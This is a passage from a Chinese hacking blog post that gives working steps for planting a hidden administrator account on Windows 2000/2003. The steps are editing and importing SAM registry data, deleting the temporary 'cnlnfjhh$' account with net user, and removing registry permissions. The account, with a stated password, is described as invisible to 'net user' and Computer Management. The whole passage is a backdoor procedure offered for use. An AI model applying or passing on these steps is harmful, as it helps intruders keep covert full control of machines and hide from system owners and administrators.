fa,2c,88,d7,f1,cd,99,cf,0d,01,00,01,00,a0,05,70,54,f3,45,3e,4a,64,95,ef,6c,\
37,f1,02,cf,01,00,01,00,01,00,01,00

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\cnlnfjhh$]
@=hex(3f1):

保存后,将cnlnfjhh$用户删除 [在导入数据库之前一定要先删除这个新加的帐号]c:\>net user cnlnfjhh$ /delete
运行regedit.exe 将我们已经修改好的3f1.reg文件导入.
最后,打开regedt32.exe 找到HKEY_LOCAL_MAICHINE\SAM\SAM 点击它 ,然后在菜单"安全"->"权限" 删除刚才添加的帐号

然后注销当前用户用 cnlnfjhh$ /wrsky 登陆就会是最高权限了.

03克隆的方法和 2000的克隆略有点区别就是我文章的那前一部分.

这样就建立了一个在控制台用 net user 和"计算机管理"中都看不到的帐户cnlnfjhh$, 记着第一次就把密码设置好,不要改密码.负责会失效.

类别：〓经典转载〓 | 评论(1) | 浏览()